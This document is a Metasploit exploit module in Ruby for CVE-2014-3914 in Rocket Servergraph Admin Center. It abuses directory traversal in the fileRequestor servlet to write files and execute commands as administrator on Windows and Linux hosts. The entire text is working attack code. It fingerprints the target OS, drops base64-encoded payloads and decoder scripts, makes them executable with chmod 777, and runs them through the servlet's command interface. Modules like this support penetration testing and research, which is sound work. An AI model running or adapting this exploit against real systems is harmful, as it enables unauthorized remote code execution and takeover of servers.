Rocket Servergraph Admin Center fileRequestor Remote Code Execution

`##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::FileDropper  
include Msf::Exploit::EXE  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Rocket Servergraph Admin Center fileRequestor Remote Code Execution',  
'Description' => %q{  
This module abuses several directory traversal flaws in Rocket Servergraph Admin  
Center for Tivoli Storage Manager. The issues exist in the fileRequestor servlet,  
allowing a remote attacker to write arbitrary files and execute commands with  
administrative privileges. This module has been tested successfully on Rocket  
ServerGraph 1.2 over Windows 2008 R2 64 bits, Windows 7 SP1 32 bits and Ubuntu  
12.04 64 bits.  
},  
'Author' =>  
[  
'rgod <rgod[at]autistici.org>', # Vulnerability discovery  
'juan vazquez' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
['CVE', '2014-3914'],  
['ZDI', '14-161'],  
['ZDI', '14-162'],  
['BID', '67779']  
],  
'Privileged' => true,  
'Platform' => %w{ linux unix win },  
'Arch' => [ARCH_X86, ARCH_X86_64, ARCH_CMD],  
'Payload' =>  
{  
'Space' => 8192, # it's writing a file, so just a long enough value  
'DisableNops' => true  
#'BadChars' => (0x80..0xff).to_a.pack("C*") # Doesn't apply  
},  
'Targets' =>  
[  
[ 'Linux (Native Payload)',  
{  
'Platform' => 'linux',  
'Arch' => ARCH_X86  
}  
],  
[ 'Linux (CMD Payload)',  
{  
'Platform' => 'unix',  
'Arch' => ARCH_CMD  
}  
],  
[ 'Windows / VB Script',  
{  
'Platform' => 'win',  
'Arch' => ARCH_X86  
}  
],  
[ 'Windows CMD',  
{  
'Platform' => 'win',  
'Arch' => ARCH_CMD  
}  
]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Oct 30 2013'))  
  
register_options(  
[  
Opt::RPORT(8888)  
], self.class)  
  
register_advanced_options(  
[  
OptInt.new('TRAVERSAL_DEPTH', [ true, 'Traversal depth to hit the root folder', 20]),  
OptString.new("WINDIR", [ true, 'The Windows Directory name', 'WINDOWS' ]),  
OptString.new("TEMP_DIR", [ false, 'A directory where we can write files' ])  
], self.class)  
  
end  
  
def check  
os = get_os  
  
if os.nil?  
return Exploit::CheckCode::Safe  
end  
  
Exploit::CheckCode::Appears  
end  
  
def exploit  
os = get_os  
  
if os == 'win' && target.name =~ /Linux/  
fail_with(Failure::BadConfig, "#{peer} - Windows system detected, but Linux target selected")  
elsif os == 'linux' && target.name =~ /Windows/  
fail_with(Failure::BadConfig, "#{peer} - Linux system detected, but Windows target selected")  
elsif os.nil?  
print_warning("#{peer} - Failed to detect remote operating system, trying anyway...")  
end  
  
if target.name =~ /Windows.*VB/  
exploit_windows_vbs  
elsif target.name =~ /Windows.*CMD/  
exploit_windows_cmd  
elsif target.name =~ /Linux.*CMD/  
exploit_linux_cmd  
elsif target.name =~ /Linux.*Native/  
exploit_linux_native  
end  
end  
  
def exploit_windows_vbs  
traversal = "\\.." * traversal_depth  
payload_base64 = Rex::Text.encode_base64(generate_payload_exe)  
temp = temp_dir('win')  
decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.vbs"  
encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64"  
exe_file_name = "#{rand_text_alpha(4 + rand(3))}.exe"  
  
print_status("#{peer} - Dropping the encoded payload to filesystem...")  
write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64)  
  
vbs = generate_decoder_vbs({  
:temp_dir => "C:#{temp}",  
:encoded_file_name => encoded_file_name,  
:exe_file_name => exe_file_name  
})  
print_status("#{peer} - Dropping the VBS decoder to filesystem...")  
write_file("#{traversal}#{temp}#{decoder_file_name}", vbs)  
  
register_files_for_cleanup("C:#{temp}#{decoder_file_name}")  
register_files_for_cleanup("C:#{temp}#{encoded_file_name}")  
register_files_for_cleanup("C:#{temp}#{exe_file_name}")  
print_status("#{peer} - Executing payload...")  
execute("#{traversal}\\#{win_dir}\\System32\\cscript //nologo C:#{temp}#{decoder_file_name}")  
end  
  
  
def exploit_windows_cmd  
traversal = "\\.." * traversal_depth  
execute("#{traversal}\\#{win_dir}\\System32\\cmd.exe /B /C #{payload.encoded}")  
end  
  
def exploit_linux_native  
traversal = "/.." * traversal_depth  
payload_base64 = Rex::Text.encode_base64(generate_payload_exe)  
temp = temp_dir('linux')  
encoded_file_name = "#{rand_text_alpha(4 + rand(3))}.b64"  
decoder_file_name = "#{rand_text_alpha(4 + rand(3))}.sh"  
elf_file_name = "#{rand_text_alpha(4 + rand(3))}.elf"  
  
print_status("#{peer} - Dropping the encoded payload to filesystem...")  
write_file("#{traversal}#{temp}#{encoded_file_name}", payload_base64)  
  
decoder = <<-SH  
#!/bin/sh  
  
base64 --decode #{temp}#{encoded_file_name} > #{temp}#{elf_file_name}  
chmod 777 #{temp}#{elf_file_name}  
#{temp}#{elf_file_name}  
SH  
  
print_status("#{peer} - Dropping the decoder to filesystem...")  
write_file("#{traversal}#{temp}#{decoder_file_name}", decoder)  
  
register_files_for_cleanup("#{temp}#{decoder_file_name}")  
register_files_for_cleanup("#{temp}#{encoded_file_name}")  
register_files_for_cleanup("#{temp}#{elf_file_name}")  
  
print_status("#{peer} - Giving execution permissions to the decoder...")  
execute("#{traversal}/bin/chmod 777 #{temp}#{decoder_file_name}")  
  
print_status("#{peer} - Executing decoder and payload...")  
execute("#{traversal}/bin/sh #{temp}#{decoder_file_name}")  
end  
  
def exploit_linux_cmd  
temp = temp_dir('linux')  
elf = rand_text_alpha(4 + rand(4))  
  
traversal = "/.." * traversal_depth  
print_status("#{peer} - Dropping payload...")  
write_file("#{traversal}#{temp}#{elf}", payload.encoded)  
register_files_for_cleanup("#{temp}#{elf}")  
print_status("#{peer} - Providing execution permissions...")  
execute("#{traversal}/bin/chmod 777 #{temp}#{elf}")  
print_status("#{peer} - Executing payload...")  
execute("#{traversal}#{temp}#{elf}")  
end  
  
def generate_decoder_vbs(opts = {})  
decoder_path = File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64")  
  
f = File.new(decoder_path, "rb")  
decoder = f.read(f.stat.size)  
f.close  
  
decoder.gsub!(/>>decode_stub/, "")  
decoder.gsub!(/^echo /, "")  
decoder.gsub!(/ENCODED/, "#{opts[:temp_dir]}#{opts[:encoded_file_name]}")  
decoder.gsub!(/DECODED/, "#{opts[:temp_dir]}#{opts[:exe_file_name]}")  
  
decoder  
end  
  
def get_os  
os = nil  
path = ""  
hint = rand_text_alpha(3 + rand(4))  
  
res = send_request(20, "writeDataFile", rand_text_alpha(4 + rand(10)), "/#{hint}/#{hint}")  
  
if res && res.code == 200 && res.body =~ /java.io.FileNotFoundException: (.*)\/#{hint}\/#{hint} \(No such file or directory\)/  
path = $1  
elsif res && res.code == 200 && res.body =~ /java.io.FileNotFoundException: (.*)\\#{hint}\\#{hint} \(The system cannot find the path specified\)/  
path = $1  
end  
  
if path =~ /^\//  
os = 'linux'  
elsif path =~ /^[a-zA-Z]:\\/  
os = 'win'  
end  
  
os  
end  
  
def temp_dir(os)  
temp = ""  
case os  
when 'linux'  
temp = linux_temp_dir  
when 'win'  
temp = win_temp_dir  
end  
  
temp  
end  
  
def linux_temp_dir  
dir = "/tmp/"  
  
if datastore['TEMP_DIR'] && !datastore['TEMP_DIR'].empty?  
dir = datastore['TEMP_DIR']  
end  
  
unless dir.start_with?("/")  
dir = "/#{dir}"  
end  
  
unless dir.end_with?("/")  
dir = "#{dir}/"  
end  
  
dir  
end  
  
def win_temp_dir  
dir = "\\#{win_dir}\\Temp\\"  
  
if datastore['TEMP_DIR'] && !datastore['TEMP_DIR'].empty?  
dir = datastore['TEMP_DIR']  
end  
  
dir.gsub!(/\//, "\\")  
dir.gsub!(/^([A-Za-z]:)?/, "")  
  
unless dir.start_with?("\\")  
dir = "\\#{dir}"  
end  
  
unless dir.end_with?("\\")  
dir = "#{dir}\\"  
end  
  
dir  
end  
  
def win_dir  
dir = "WINDOWS"  
if datastore['WINDIR']  
dir = datastore['WINDIR']  
dir.gsub!(/\//, "\\")  
dir.gsub!(/[\\]*$/, "")  
dir.gsub!(/^([A-Za-z]:)?[\\]*/, "")  
end  
  
dir  
end  
  
def traversal_depth  
depth = 20  
  
if datastore['TRAVERSAL_DEPTH'] && datastore['TRAVERSAL_DEPTH'] > 1  
depth = datastore['TRAVERSAL_DEPTH']  
end  
  
depth  
end  
  
def write_file(file_name, contents)  
res = send_request(20, "writeDataFile", Rex::Text.uri_encode(contents), file_name)  
  
unless res && res.code == 200 && res.body.to_s =~ /Data successfully writen to file: /  
fail_with(Failure::Unknown, "#{peer} - Failed to write file... aborting")  
end  
  
res  
end  
  
def execute(command)  
res = send_request(1, "run", command)  
  
res  
end  
  
def send_request(timeout, command, query, source = rand_text_alpha(rand(4) + 4))  
data = "&invoker=#{rand_text_alpha(rand(4) + 4)}"  
data << "&title=#{rand_text_alpha(rand(4) + 4)}"  
data << "&params=#{rand_text_alpha(rand(4) + 4)}"  
data << "&id=#{rand_text_alpha(rand(4) + 4)}"  
data << "&cmd=#{command}"  
data << "&source=#{source}"  
data << "&query=#{query}"  
  
res = send_request_cgi(  
{  
'uri' => normalize_uri('/', 'SGPAdmin', 'fileRequest'),  
'method' => 'POST',  
'data' => data  
}, timeout)  
  
res  
end  
  
end  
`